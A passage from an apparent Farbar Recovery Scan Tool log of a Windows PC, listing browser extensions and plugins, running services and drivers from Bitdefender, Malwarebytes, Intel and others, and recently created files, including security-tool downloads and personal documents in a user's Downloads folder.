    Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)

    FireFox:
    ========
    FF DefaultProfile: y2l2kxa2.default
    FF ProfilePath: C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default [2017-02-02]
    FF Extension: (Adblock Plus) - C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-02-01]
    FF Extension: (Diagnostics) - C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default\features\{9ef51dc5-bd5f-423f-8914-b6fd30d03cbc}\[email protected] [2017-02-01]
    FF Extension: (Send HSTS Priming Requests) - C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default\features\{9ef51dc5-bd5f-423f-8914-b6fd30d03cbc}\[email protected] [2017-02-01]
    FF HKLM\...\Firefox\Extensions: [[email protected]itdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
    FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-01-19]
    FF HKLM\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
    FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [not signed]
    FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
    FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-12-09] (Adobe Systems)
    FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1225195.dll [2016-09-20] (Adobe Systems, Inc.)
    FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2016-09-05] (Citrix Systems, Inc.)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel Corporation)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-12-28] (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
    FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2015-12-22] ()
    FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-12-09] (Adobe Systems)

    Chrome:
    =======
    CHR Plugin: (Widevine Content Decryption Module) - C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\WidevineCdm\_platform_specific\win_x64\widevinecdmadapter.dll (Google Inc.)
    CHR Plugin: (Shockwave Flash) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\PepperFlash\24.0.0.194\pepflashplayer.dll ()
    CHR Profile: C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default [2017-02-01]
    CHR Extension: (Google Docs) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-09-24]
    CHR Extension: (Google Drive) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-24]
    CHR Extension: (YouTube) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-09-22]
    CHR Extension: (Bitdefender Wallet) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\gannpgaobkkhmpomoijebaigcapoeebl [2017-02-01]
    CHR Extension: (Google Docs Offline) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-09-22]
    CHR Extension: (AdBlock) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-01-31]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-21]
    CHR Extension: (Gmail) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-09-22]
    CHR Extension: (Chrome Media Router) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-04]
    CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx

    ==================== Services (Whitelisted) ====================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [753240 2016-12-09] (Adobe Systems Incorporated)
    R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2227312 2017-01-19] (Adobe Systems, Incorporated)
    R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3699904 2016-12-28] (Microsoft Corporation)
    S2 cplspcon; C:\WINDOWS\system32\IntelCpHDCPSvc.exe [431088 2016-09-25] (Intel Corporation)
    S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
    S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
    R2 DevMgmtService; C:\Program Files\Bitdefender\Bitdefender Device Management\DevMgmtService.exe [100448 2016-11-29] (Bitdefender)
    R2 esifsvc; C:\WINDOWS\SysWoW64\esif_uf.exe [1419424 2016-09-25] (Intel Corporation)
    R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [349728 2015-12-22] (WildTangent)
    R2 HP Comm Recover; C:\Program Files\HPCommRecovery\HPCommRecovery.exe [48128 2016-04-18] (HP Inc.) [File not signed]
    R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [31776 2016-12-07] (HP Inc.)
    R2 HPWMISVC; c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2016-01-11] (HP Inc.)
    R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [19440 2015-11-04] (Intel Corporation)
    R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [356336 2016-09-25] (Intel Corporation)
    S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [976848 2016-01-14] (Intel® Corporation)
    S3 Intel® WiDi SAM; C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [19088 2015-09-17] (Intel Corporation)
    R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [209184 2016-02-11] (Intel Corporation)
    R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
    S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268704 2016-08-04] ()
    R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1100392 2016-10-28] (Bitdefender)
    R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [389896 2014-04-14] ()
    R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [322560 2017-01-13] (Realtek Semiconductor)
    R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [266872 2016-08-19] (Synaptics Incorporated)
    R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-01-06] (Bitdefender)
    R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1526528 2017-02-01] (Bitdefender)
    R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
    R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3732896 2016-08-04] (Intel® Corporation)

    ===================== Drivers (Whitelisted) ======================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
    R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
    S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
    R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
    R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
    R3 dptf_cpu; C:\WINDOWS\System32\drivers\dptf_cpu.sys [52208 2016-09-25] (Intel Corporation)
    R3 esif_lf; C:\WINDOWS\system32\DRIVERS\esif_lf.sys [260080 2016-09-25] (Intel Corporation)
    R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77416 2017-01-20] ()
    R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
    R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [345872 2016-05-26] (Intel Corporation)
    R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [309280 2016-11-17] (Bitdefender)
    R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [176064 2017-02-01] (Malwarebytes)
    R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [110536 2017-02-01] (Malwarebytes)
    R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-02-01] (Malwarebytes)
    R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [251848 2017-02-01] (Malwarebytes)
    S3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [91584 2017-02-02] (Malwarebytes)
    R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [91584 2017-02-02] (Malwarebytes)
    S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
    U5 Netwtw02; C:\Windows\System32\Drivers\Netwtw02.sys [6724368 2016-02-06] (Intel Corporation)
    R3 Netwtw04; C:\WINDOWS\System32\drivers\Netwtw04.sys [7308560 2016-09-13] (Intel Corporation)
    R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [935168 2016-01-19] (Realtek                                            )
    S3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [769752 2016-01-20] (Realsil Semiconductor Corporation)
    S3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [413912 2016-01-20] (Realsil Semiconductor Corporation)
    S3 SmbDrv; C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [58984 2016-02-22] (Synaptics Incorporated)
    R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [72824 2016-08-19] (Synaptics Incorporated)
    R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
    S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
    S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
    S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
    R3 WirelessButtonDriver64; C:\WINDOWS\system32\DRIVERS\WirelessButtonDriver64.sys [31656 2016-04-14] (HP)
    U0 aswVmm; no ImagePath

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2017-02-01 21:13 - 2017-02-01 21:16 - 00002795 _____ C:\Users\Joseph\Downloads\Fixlog.txt
    2017-02-01 21:11 - 2017-02-01 21:13 - 00000000 ____D C:\Users\Joseph\Documents\FRST911
    2017-02-01 20:30 - 2017-02-02 10:14 - 00000000 ____D C:\Users\Joseph\AppData\LocalLow\Mozilla
    2017-02-01 20:29 - 2017-02-01 20:36 - 00000000 ____D C:\Users\Joseph\AppData\Local\Mozilla
    2017-02-01 20:29 - 2017-02-01 20:30 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Mozilla
    2017-02-01 20:28 - 2017-02-01 20:28 - 00001239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2017-02-01 20:28 - 2017-02-01 20:28 - 00001227 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
    2017-02-01 20:28 - 2017-02-01 20:28 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
    2017-02-01 20:28 - 2017-02-01 20:28 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
    2017-02-01 20:26 - 2017-02-01 20:27 - 00245424 _____ C:\Users\Joseph\Downloads\Firefox Setup Stub 51.0.1.exe
    2017-02-01 18:24 - 2017-02-01 18:25 - 55566792 _____ (Malwarebytes ) C:\Users\Joseph\Downloads\mb3-setup-cb.NT-3.0.6.1469.exe
    2017-02-01 17:47 - 2017-02-01 21:33 - 00037463 _____ C:\Users\Joseph\Downloads\Addition.txt
    2017-02-01 17:45 - 2017-02-02 12:02 - 00024572 _____ C:\Users\Joseph\Downloads\FRST.txt
    2017-02-01 17:45 - 2017-02-02 12:02 - 00000000 ____D C:\FRST
    2017-02-01 17:43 - 2017-02-01 17:45 - 02420736 _____ (Farbar) C:\Users\Joseph\Downloads\FRST64.exe
    2017-02-01 17:20 - 2017-02-01 17:27 - 00000556 _____ C:\Users\Joseph\Desktop\JRT.txt
    2017-02-01 17:07 - 2017-02-01 21:17 - 00002361 _____ C:\bdlog.txt
    2017-02-01 17:02 - 2017-02-01 18:10 - 00000000 ____D C:\AdwCleaner
    2017-02-01 16:58 - 2017-02-01 17:15 - 01663040 _____ (Malwarebytes) C:\Users\Joseph\Downloads\JRT (1).exe
    2017-02-01 16:56 - 2017-02-01 16:58 - 01663040 _____ (Malwarebytes) C:\Users\Joseph\Downloads\JRT.exe
    2017-02-01 16:54 - 2017-02-01 17:01 - 03988944 _____ C:\Users\Joseph\Downloads\AdwCleaner.exe
    2017-02-01 16:52 - 2017-02-01 16:52 - 00040137 _____ C:\ProgramData\dm.1485985887.bdinstall.bin
    2017-02-01 09:33 - 2017-02-01 09:33 - 00000385 _____ C:\WINDOWS\system32\user_gensett.xml
    2017-02-01 08:54 - 2017-02-01 08:54 - 00000000 ____D C:\Users\Joseph\AppData\Temp
    2017-02-01 08:52 - 2017-02-01 08:52 - 00056949 _____ C:\ProgramData\dm.1485956857.bdinstall.bin
    2017-02-01 08:51 - 2017-02-01 08:51 - 00000000 ____D C:\ProgramData\Bitdefender Device Management
    2017-02-01 08:47 - 2017-02-01 18:34 - 00003406 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
    2017-02-01 08:47 - 2017-02-01 08:47 - 00403991 _____ C:\ProgramData\cl.1485956260.bdinstall.bin
    2017-02-01 08:45 - 2017-02-01 08:45 - 00002310 _____ C:\Users\Public\Desktop\Bitdefender 2017.lnk
    2017-02-01 08:45 - 2017-02-01 08:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
    2017-02-01 08:45 - 2017-02-01 08:45 - 00000000 ____D C:\ProgramData\BDLogging
    2017-02-01 08:44 - 2016-09-20 04:17 - 01605376 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avc3.sys
    2017-02-01 08:44 - 2016-09-20 04:16 - 00878072 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avckf.sys
    2017-02-01 08:44 - 2016-03-14 22:04 - 00023672 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\bdelam.sys
    2017-02-01 08:44 - 2015-12-04 19:27 - 00087912 _____ (BitDefender) C:\WINDOWS\system32\Drivers\bdvedisk.sys
    2017-02-01 08:44 - 2007-04-11 11:11 - 00511328 _____ (Microsoft Corporation) C:\WINDOWS\capicom.dll
    2017-02-01 08:43 - 2017-02-01 08:51 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Bitdefender
    2017-02-01 08:43 - 2016-11-17 05:00 - 00309280 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\ignis.sys
    2017-02-01 08:38 - 2017-02-01 18:34 - 00000000 ____D C:\ProgramData\Bitdefender
    2017-02-01 08:38 - 2017-02-01 08:47 - 00000000 ____D C:\Program Files\Bitdefender
    2017-02-01 08:38 - 2016-10-29 08:54 - 00182944 _____ (BitDefender LLC) C:\WINDOWS\system32\Drivers\gzflt.sys
    2017-02-01 08:38 - 2016-06-22 14:40 - 00520032 _____ (BitDefender S.R.L.) C:\WINDOWS\system32\Drivers\trufos.sys
    2017-02-01 08:37 - 2017-02-01 08:38 - 00000000 ____D C:\Program Files\Common Files\Bitdefender
    2017-02-01 08:37 - 2017-02-01 08:37 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\QuickScan
    2017-02-01 08:29 - 2017-02-01 08:29 - 00003794 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
    2017-02-01 08:27 - 2017-02-02 12:05 - 00000000 ____D C:\Program Files\Bitdefender Agent
    2017-02-01 08:27 - 2017-02-01 08:27 - 00047353 _____ C:\ProgramData\agent.1485955633.bdinstall.bin
    2017-02-01 08:27 - 2017-02-01 08:27 - 00000000 ____D C:\ProgramData\Bitdefender Agent
    2017-02-01 08:26 - 2017-02-01 08:27 - 11842648 _____ C:\Users\Joseph\Downloads\bitdefender_windows_43ea11d5-575e-4d5e-84a9-5683192df898.exe
    2017-01-31 23:27 - 2017-01-31 23:27 - 00000017 _____ C:\Users\Joseph\AppData\Local\resmon.resmoncfg
    2017-01-31 23:13 - 2017-01-31 23:13 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\132034FB.sys
    2017-01-31 15:37 - 2017-01-31 15:37 - 01923396 _____ C:\Users\Joseph\Downloads\hospital visit.pdf
    2017-01-30 20:58 - 2017-01-30 20:59 - 02059056 _____ (The Nielsen Company) C:\Users\Joseph\Downloads\ShopTracker_033D6D4A68A315B4A000 (2).exe
    2017-01-28 01:57 - 2017-01-28 01:57 - 00000000 ____D C:\WINDOWS\System32\Tasks\AVAST Software
    2017-01-28 01:57 - 2017-01-28 01:57 - 00000000 ____D C:\Program Files\Common Files\AV
    2017-01-25 00:02 - 2016-12-21 02:08 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
    2017-01-25 00:02 - 2016-12-20 23:44 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
    2017-01-24 23:47 - 2017-01-21 21:14 - 00485032 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
    2017-01-24 17:47 - 2017-01-24 17:47 - 10697014 _____ C:\Users\Joseph\Downloads\FDN_Glyphosate_FoodTesting_Report_p2016.pdf
    2017-01-24 13:33 - 2017-01-24 13:33 - 00083650 _____ C:\Users\Joseph\Downloads\visit 1-23.pdf
    2017-01-21 13:55 - 2017-02-01 08:34 - 00000000 ____D C:\ProgramData\AVAST Software
    2017-01-21 13:55 - 2017-01-21 13:55 - 06253640 _____ (AVAST Software) C:\Users\Joseph\Downloads\avast_free_antivirus_setup_online_cnet_2.exe
    2017-01-19 21:09 - 2017-01-19 21:09 - 00151143 _____ C:\Users\Joseph\Downloads\PDF_Bill (2).pdf
    2017-01-19 21:09 - 2017-01-19 21:09 - 00150985 _____ C:\Users\Joseph\Downloads\PDF_Bill (3).pdf
    2017-01-19 21:08 - 2017-01-19 21:08 - 00199440 _____ C:\Users\Joseph\Downloads\PDF_Bill (1).pdf
    2017-01-19 21:06 - 2017-01-19 21:06 - 00001115 _____ C:\Users\Joseph\Downloads\AccountEnergyUsage.csv
    2017-01-19 20:26 - 2017-01-19 20:26 - 00223944 _____ C:\Users\Joseph\Downloads\djcxMjYtODA5MC04MDkxLTgzNjMtT0lCMS00MDRGQUFCQi0wLTIyMzk0NC00Nzk2ODE3LTIyMzk0NC04NS02OC0wLTE2OS0wLV4BUAExNzA5NgEyMzYxNAE0AUNCQwFDQkMwMQEyMDA0LTAwMDEBQUNDRVNTIE5BVElPTkFMIENPUlBPUkFUSU9OIFBST0ZJVCBTSEFSSU5HIFBMQU4BTkEBUk.pdf
    2017-01-19 14:36 - 2017-01-19 14:36 - 00000000 ____D C:\Users\Joseph\AppData\LocalLow\Temp
    2017-01-18 22:07 - 2017-01-18 22:07 - 00676419 _____ C:\Users\Joseph\Downloads\137230-201711873115438.pdf
    2017-01-15 18:00 - 2017-01-15 18:00 - 00151143 _____ C:\Users\Joseph\Downloads\PDF_Bill.pdf
    2017-01-15 16:33 - 2017-01-15 16:33 - 00086004 _____ C:\Users\Joseph\Downloads\DS82_Complete (1).pdf
    2017-01-15 16:15 - 2017-01-15 16:15 - 00683112 _____ C:\Users\Joseph\Downloads\taxReturn (1).tax2016
    2017-01-15 16:11 - 2017-01-15 16:24 - 01487502 _____ C:\Users\Joseph\Downloads\taxReturn.tax2016
    2017-01-15 15:50 - 2017-01-15 15:50 - 06281998 _____ C:\Users\Joseph\Downloads\C2 Artist Mini-Posters.pdf
    2017-01-15 15:44 - 2017-01-15 15:44 - 00002529 _____ C:\Users\Public\Desktop\TurboTax 2016.lnk
    2017-01-15 15:44 - 2017-01-15 15:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TurboTax 2016
    2017-01-15 15:29 - 2017-01-15 15:30 - 121060464 _____ C:\Users\Joseph\Downloads\turbotax_deluxe_2016_windows.exe
    2017-01-14 21:56 - 2017-01-14 21:56 - 00085948 _____ C:\Users\Joseph\Downloads\DS82_Complete.pdf
    2017-01-14 11:22 - 2017-01-14 11:22 - 00235450 _____ C:\Users\Joseph\Downloads\CAMP_CONNECTION_CARNIVAL_flier2106.pdf
    2017-01-13 15:55 - 2017-01-13 15:53 - 72520712 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoRes64.dat
    2017-01-13 15:55 - 2017-01-13 15:53 - 07704619 _____ C:\WINDOWS\system32\Drivers\RTAIODAT.DAT
    2017-01-13 15:55 - 2017-01-13 15:53 - 03204096 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtPgEx64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 03014144 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTSnMg64.cpl
    2017-01-13 15:55 - 2017-01-13 15:53 - 02706856 _____ (DTS, Inc.) C:\WINDOWS\system32\sltech64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 02201088 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoInstII64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01615656 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64APO.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01529136 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64Proxy.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01435136 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRRPTR64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01360512 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTCOM64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01003320 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDHF64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00984912 _____ (DTS, Inc.) C:\WINDOWS\system32\sl3apo64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00865912 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SEHDHF32.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00859216 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDRA64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00850400 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SECOMN64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00721800 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SECOMN32.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00689872 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtDataProc64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00574752 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAC64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00532376 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSX64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00499152 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEAPO64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00467152 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRAPO64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00438688 _____ (Conexant Systems, Inc.) C:\WINDOWS\system32\CAF64APO2.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00387312 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEP64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00381400 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00343704 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtlCPAPI64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00341144 _____ (Synopsys, Inc.) C:\WINDOWS\SysWOW64\SRCOM.dll
